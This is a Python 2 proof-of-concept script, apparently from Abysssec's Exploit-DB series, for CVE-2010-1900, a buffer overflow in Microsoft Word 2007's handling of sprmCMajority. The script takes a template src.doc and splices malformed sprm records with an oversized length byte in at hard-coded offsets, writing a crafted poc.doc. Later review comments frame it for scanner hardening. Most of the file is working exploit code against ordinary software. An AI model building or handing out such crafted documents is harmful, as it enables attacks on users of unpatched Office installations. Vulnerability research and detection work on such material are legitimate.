''' |
__ __ ____ _ _ ____ |
| \/ |/ __ \ /\ | | | | _ \ |
| \ / | | | | / \ | | | | |_) | |
| |\/| | | | |/ /\ \| | | | _ < |
| | | | |__| / ____ \ |__| | |_) | |
|_| |_|\____/_/ \_\____/|____/ |
|
http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ |
http://www.exploit-db.com/sploits/moaub-11-exploit.zip |
''' |
|
''' |
Title : Microsoft Office Word sprmCMajority buffer overflow |
Version : Word 2007 SP 2 |
Analysis : http://www.abysssec.com |
Vendor : http://www.microsoft.com |
Impact : Critical |
Contact : shahin [at] abysssec.com , info [at] abysssec.com |
Twitter : @abysssec |
CVE : CVE-2010-1900 |
|
''' |
|
import sys |
|
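def main():
    """Rebuild the CVE-2010-1900 proof-of-concept document (Python 2 script).

    Reads ``src.doc`` from the current directory and writes ``poc.doc``: a
    copy in which the six bytes at offsets 4082-4087 are replaced by two
    three-byte records, so the output has the same length as the input.

    The offsets are hard-coded.  They presumably match the ``src.doc``
    shipped in the archive linked in the file header (TODO confirm); with
    any other input the records land at an arbitrary position.  No length
    check is made on the input.

    On IOError an error message is printed and ``sys.exit(-1)`` is called.
    """
    try:
        # The template is only read, so read-only mode is enough; the
        # context manager closes the handle even if read() fails.
        with open('src.doc', 'rb') as fdR:
            strTotal = fdR.read()

        # Everything before and after the six-byte window that is replaced.
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]

        # Each value is a little-endian sprm opcode (0xCA47, 0xC63E)
        # followed by the byte 0xFF.
        # NOTE(review): for these sprms the byte after the opcode is
        # presumably the operand-size field, so 0xFF would declare far more
        # operand data than the record carries -- confirm against the
        # linked analysis.  That mismatch is the property a document
        # scanner or parser hardening check would look for.
        sprmCMajority = "\x47\xCA\xFF"  # sprmCMajority
        sprmPAnld80 = "\x3E\xC6\xFF"  # sprmPAnld80

        # Write-only, truncating; closed on every path, including a failed
        # write, which the original left to garbage collection.
        with open('poc.doc', 'wb') as fdW:
            fdW.write(str1)
            fdW.write(sprmCMajority)
            fdW.write(sprmPAnld80)
            fdW.write(str2)

        print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)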
|
# Entry-point guard: the document is only generated when this file is run
# as a script, never as a side effect of importing it.
if __name__ == "__main__":
    main()